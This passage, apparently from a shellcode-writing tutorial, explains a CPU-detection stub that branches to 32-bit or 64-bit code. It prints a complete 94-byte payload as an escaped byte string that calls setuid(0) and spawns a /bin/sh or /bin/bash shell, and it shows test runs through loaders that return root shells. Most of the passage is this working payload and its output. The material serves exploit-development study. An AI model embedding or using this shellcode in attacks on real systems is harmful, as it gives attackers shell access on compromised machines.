    The idea here is that if its on a 32-bit system, it will jump over the 64-bit payload and execute the 32-bit system. If its on a 64-bit system, it will execute the 64-bit code without continuing to the 32-bit code because execve() is blocking. I appended the 64-bit payload, followed by the 32-bit payload to our altered getCPU with the conditional jump:
    This comes out to 94 bytes.

    Testing the shellcode

    • On 32-bit:
      root@box:~/Downloads/shellcode/loaders# ./loader-32 "$(echo -en "TX4HPZTAZAYVH92t\x20\x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x6a\x68\x48\xb8\x2f\x62\x69\x6e\x2f\x62\x61\x73\x50\x54\x5f\x6a\x3b\x58\x0f\x05\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh")"
      # id
      uid=0(root) gid=0(root) groups=0(root)
      # exit
    • On 64-bit:
      root@box:~/Downloads/shellcode/loaders# ./loader-64 "$(echo -en "TX4HPZTAZAYVH92t\x20\x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x6a\x68\x48\xb8\x2f\x62\x69\x6e\x2f\x62\x61\x73\x50\x54\x5f\x6a\x3b\x58\x0f\x05\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh")"
      root@box:/home/hats/Downloads/shellcode/loaders# id
      uid=0(root) gid=0(root) groups=0(root)
      root@box:/home/hats/Downloads/shellcode/loaders# exit
    This same tricks works for windows shellcodes as well, the getCPU stub does not interfere with operating system internals or cause exceptions to be raised.